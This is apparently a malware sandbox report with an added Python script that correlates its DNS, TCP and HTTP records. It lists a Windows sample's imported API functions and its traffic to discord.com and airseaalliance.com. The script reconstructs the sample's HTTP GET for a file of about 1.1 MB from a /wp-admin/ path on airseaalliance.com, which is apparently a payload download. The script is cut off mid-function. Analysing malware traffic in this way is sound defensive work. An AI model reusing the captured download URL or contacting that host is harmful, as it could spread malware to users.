kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll    GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll  lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll     UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetDCBrushColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll    CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll  Sleep
oleaut32.dll  SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll  ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
wininet.dll   InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
winmm.dll     sndPlaySoundA

Possible Origin

Language of compilation system  Country where language is spoken  Map
English                         United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 21, 2020 21:00:57.865257025 CET  49707        443        192.168.2.3      162.159.136.232
Nov 21, 2020 21:00:57.882230997 CET  443          49707      162.159.136.232  192.168.2.3
Nov 21, 2020 21:00:57.882400990 CET  49707        443        192.168.2.3      162.159.136.232
Nov 21, 2020 21:00:57.883415937 CET  49707        443        192.168.2.3      162.159.136.232
Nov 21, 2020 21:00:57.900219917 CET  443          49707      162.159.136.232  192.168.2.3
Nov 21, 2020 21:00:57.900384903 CET  49707        443        192.168.2.3      162.159.136.232
Nov 21, 2020 21:00:58.107439995 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.232023954 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.232170105 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.233391047 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.358604908 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360580921 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360635042 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360675097 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360675097 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.360706091 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.360712051 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360726118 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.360750914 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360774040 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.360788107 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360805988 CET  49708        80         192.168.2.3      198.136.51.123
Nov 21, 2020 21:00:58.360836029 CET  80           49708      198.136.51.123   192.168.2.3
Nov 21, 2020 21:00:58.360841990 CET  49708        80         192.168.2.3      198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360877991 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360894918 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360914946 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360932112 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.360954046 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.360969067 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.361007929 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.485824108 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.485892057 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486099005 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.486788034 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486826897 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.486881971 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.486921072 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.487808943 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.487850904 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.487886906 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.487907887 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.488884926 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.488924026 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.488969088 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.488990068 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.490993023 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.491034985 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.491086960 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.491106987 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492034912 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492073059 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492113113 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492119074 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492145061 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492157936 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.492188931 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.492247105 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.494168997 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.494206905 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.494236946 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.494257927 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.495248079 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.495296001 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.495337009 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.495361090 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.610560894 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.610625029 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.610898972 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.611438990 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.611478090 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.611557007 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.611632109 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.612483025 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.612530947 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.612622023 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.612694979 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613364935 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613445997 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613486052 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613502026 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613522053 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.613570929 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.613687992 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.615385056 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.615434885 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.615511894 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.615571976 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.616334915 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.616413116 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.616457939 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.616525888 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.617328882 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.617369890 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.617432117 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.617512941 CET4970880192.168.2.3198.136.51.123
                                                                                                            Nov 21, 2020 21:00:58.633702040 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633744001 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633783102 CET8049708198.136.51.123192.168.2.3
                                                                                                            Nov 21, 2020 21:00:58.633821011 CET8049708198.136.51.123192.168.2.3

UDP Packets

Timestamp                              Source Port  Dest Port    Source IP          Dest IP
Nov 21, 2020 21:00:57.806708097 CET    55984        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:00:57.842557907 CET    53           55984        8.8.8.8            192.168.2.3
Nov 21, 2020 21:00:57.945060015 CET    64185        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:00:58.102300882 CET    53           64185        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:17.813679934 CET    65110        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:17.840747118 CET    53           65110        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:18.258506060 CET    58361        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:18.285604954 CET    53           58361        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:18.618001938 CET    63492        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:18.645210028 CET    53           63492        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:19.719357967 CET    60831        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:19.754842997 CET    53           60831        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:20.850640059 CET    60100        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:20.877729893 CET    53           60100        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:21.957295895 CET    53195        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:21.984338999 CET    53           53195        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:22.735436916 CET    50141        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:22.762587070 CET    53           50141        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:23.520838976 CET    53023        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:23.548002958 CET    53           53023        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:24.314101934 CET    49563        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:24.341200113 CET    53           49563        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:25.116338015 CET    51352        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:25.143321991 CET    53           51352        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:25.937685966 CET    59349        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:25.964956045 CET    53           59349        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:26.729284048 CET    57084        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:26.756469011 CET    53           57084        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:27.597418070 CET    58823        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:27.624511957 CET    53           58823        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:28.386131048 CET    57568        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:28.421765089 CET    53           57568        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:28.684792995 CET    50540        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:28.723356009 CET    53           50540        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:29.306592941 CET    54366        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:29.342573881 CET    53           54366        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:30.267249107 CET    53034        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:30.302912951 CET    53           53034        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:31.473155022 CET    57762        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:31.511127949 CET    53           57762        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:32.508817911 CET    55435        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:32.535972118 CET    53           55435        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:35.003534079 CET    50713        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:35.053800106 CET    53           50713        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:50.008140087 CET    56132        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:50.035235882 CET    53           56132        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:50.220679045 CET    58987        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:50.247831106 CET    53           58987        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:53.696738958 CET    56579        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:53.723889112 CET    53           56579        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:58.361183882 CET    60633        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:58.388417006 CET    53           60633        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:58.530245066 CET    61292        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:58.686759949 CET    53           61292        8.8.8.8            192.168.2.3
Nov 21, 2020 21:01:58.846334934 CET    63619        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:01:58.883179903 CET    53           63619        8.8.8.8            192.168.2.3
Nov 21, 2020 21:02:28.622030973 CET    64938        53           192.168.2.3        8.8.8.8
Nov 21, 2020 21:02:28.649229050 CET    53           64938        8.8.8.8            192.168.2.3

DNS Queries

Timestamp                              Source IP          Dest IP      Trans ID  OP Code             Name                Type            Class
Nov 21, 2020 21:00:57.806708097 CET    192.168.2.3        8.8.8.8      0x7ec7    Standard query (0)  discord.com         A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:57.945060015 CET    192.168.2.3        8.8.8.8      0x99e1    Standard query (0)  airseaalliance.com  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.008140087 CET    192.168.2.3        8.8.8.8      0x500f    Standard query (0)  discord.com         A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.220679045 CET    192.168.2.3        8.8.8.8      0xb898    Standard query (0)  airseaalliance.com  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.361183882 CET    192.168.2.3        8.8.8.8      0xab39    Standard query (0)  discord.com         A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.530245066 CET    192.168.2.3        8.8.8.8      0x854c    Standard query (0)  airseaalliance.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                              Source IP    Dest IP            Trans ID  Reply Code    Name                CName  Address          Type            Class
Nov 21, 2020 21:00:57.842557907 CET    8.8.8.8      192.168.2.3        0x7ec7    No error (0)  discord.com                162.159.136.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:57.842557907 CET    8.8.8.8      192.168.2.3        0x7ec7    No error (0)  discord.com                162.159.138.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:57.842557907 CET    8.8.8.8      192.168.2.3        0x7ec7    No error (0)  discord.com                162.159.128.233  A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:57.842557907 CET    8.8.8.8      192.168.2.3        0x7ec7    No error (0)  discord.com                162.159.135.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:57.842557907 CET    8.8.8.8      192.168.2.3        0x7ec7    No error (0)  discord.com                162.159.137.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:00:58.102300882 CET    8.8.8.8      192.168.2.3        0x99e1    No error (0)  airseaalliance.com         198.136.51.123   A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.035235882 CET    8.8.8.8      192.168.2.3        0x500f    No error (0)  discord.com                162.159.138.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.035235882 CET    8.8.8.8      192.168.2.3        0x500f    No error (0)  discord.com                162.159.135.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.035235882 CET    8.8.8.8      192.168.2.3        0x500f    No error (0)  discord.com                162.159.128.233  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.035235882 CET    8.8.8.8      192.168.2.3        0x500f    No error (0)  discord.com                162.159.136.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.035235882 CET    8.8.8.8      192.168.2.3        0x500f    No error (0)  discord.com                162.159.137.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:50.247831106 CET    8.8.8.8      192.168.2.3        0xb898    No error (0)  airseaalliance.com         198.136.51.123   A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.388417006 CET    8.8.8.8      192.168.2.3        0xab39    No error (0)  discord.com                162.159.138.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.388417006 CET    8.8.8.8      192.168.2.3        0xab39    No error (0)  discord.com                162.159.135.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.388417006 CET    8.8.8.8      192.168.2.3        0xab39    No error (0)  discord.com                162.159.128.233  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.388417006 CET    8.8.8.8      192.168.2.3        0xab39    No error (0)  discord.com                162.159.136.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.388417006 CET    8.8.8.8      192.168.2.3        0xab39    No error (0)  discord.com                162.159.137.232  A (IP address)  IN (0x0001)
Nov 21, 2020 21:01:58.686759949 CET    8.8.8.8      192.168.2.3        0x854c    No error (0)  airseaalliance.com         198.136.51.123   A (IP address)  IN (0x0001)
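
The DNS answers, the TCP packet rows and the HTTP session of this report only tell one story once they are joined: which names resolved to which addresses, which of those addresses the sample actually connected to, and what it fetched there. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It re-types a subset of this report's own rows as tab-separated sample input (the report renders them as HTML tables) and reconstructs the request and response headers of HTTP session 0 from the values shown; the correlation logic, the `http_indicators` helper and the constant `SANDBOX_HOST` (the analysis VM's address, 192.168.2.3 in this report) are this example's own. It surfaces two facts the raw tables do not state: addresses that were resolved but never contacted (four of discord.com's five A records), and whether each contacted address was handed out by DNS before the first packet to it, which separates resolved hosts from addresses hard-coded in the sample.

```python
"""Correlate the DNS, TCP and HTTP tables of a sandbox network log.
Added illustration, not part of the sandbox report; sample rows are copied
from the report and re-typed as tab-separated columns."""
from collections import defaultdict
from datetime import datetime

SANDBOX_HOST = "192.168.2.3"   # the analysis VM's address in this report

# Constructed sample: report rows (Timestamp, Source IP, Dest IP, Trans ID, Name, Address).
DNS_ANSWERS = """\
Nov 21, 2020 21:00:57.842557907 CET\t8.8.8.8\t192.168.2.3\t0x7ec7\tdiscord.com\t162.159.136.232
Nov 21, 2020 21:00:57.842557907 CET\t8.8.8.8\t192.168.2.3\t0x7ec7\tdiscord.com\t162.159.138.232
Nov 21, 2020 21:00:57.842557907 CET\t8.8.8.8\t192.168.2.3\t0x7ec7\tdiscord.com\t162.159.128.233
Nov 21, 2020 21:00:57.842557907 CET\t8.8.8.8\t192.168.2.3\t0x7ec7\tdiscord.com\t162.159.135.232
Nov 21, 2020 21:00:57.842557907 CET\t8.8.8.8\t192.168.2.3\t0x7ec7\tdiscord.com\t162.159.137.232
Nov 21, 2020 21:00:58.102300882 CET\t8.8.8.8\t192.168.2.3\t0x99e1\tairseaalliance.com\t198.136.51.123
"""

# Constructed sample: report rows (Timestamp, Source Port, Dest Port, Source IP, Dest IP).
TCP_ROWS = """\
Nov 21, 2020 21:00:57.865257025 CET\t49707\t443\t192.168.2.3\t162.159.136.232
Nov 21, 2020 21:00:57.882230997 CET\t443\t49707\t162.159.136.232\t192.168.2.3
Nov 21, 2020 21:00:58.107439995 CET\t49708\t80\t192.168.2.3\t198.136.51.123
Nov 21, 2020 21:00:58.232023954 CET\t80\t49708\t198.136.51.123\t192.168.2.3
Nov 21, 2020 21:00:58.233391047 CET\t49708\t80\t192.168.2.3\t198.136.51.123
"""

# Constructed sample: headers of HTTP session 0 as shown in the report (subset).
HTTP_REQUEST = ("GET /wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 HTTP/1.1\r\n"
                "Host: airseaalliance.com\r\nCache-Control: no-cache\r\n\r\n")
HTTP_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache\r\n"
                 'ETag: "4eb261-110000-5b4a07cb11235"\r\nContent-Length: 1114112\r\n\r\n')


def parse_ts(text):
    """Parse 'Nov 21, 2020 21:00:57.865257025 CET'. strptime's %f takes at most
    six fractional digits, so nanoseconds are truncated to microseconds."""
    date, clock, _zone = text.rsplit(" ", 2)
    hms, _, frac = clock.partition(".")
    return datetime.strptime(f"{date} {hms}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_dns_answers(text):
    """Map each answered address to the names that resolved to it and to the
    time of the earliest answer carrying it."""
    names, answered_at = defaultdict(set), {}
    for line in text.splitlines():
        ts, _src, _dst, _txid, name, addr = line.split("\t")
        when = parse_ts(ts)
        names[addr].add(name)
        answered_at[addr] = min(when, answered_at.get(addr, when))
    return names, answered_at


def parse_tcp_rows(text, sandbox_host=SANDBOX_HOST):
    """Group packets by remote endpoint (ip, port), whichever direction they flow."""
    flows = {}
    for line in text.splitlines():
        ts, sport, dport, sip, dip = line.split("\t")
        when = parse_ts(ts)
        remote = (dip, int(dport)) if sip == sandbox_host else (sip, int(sport))
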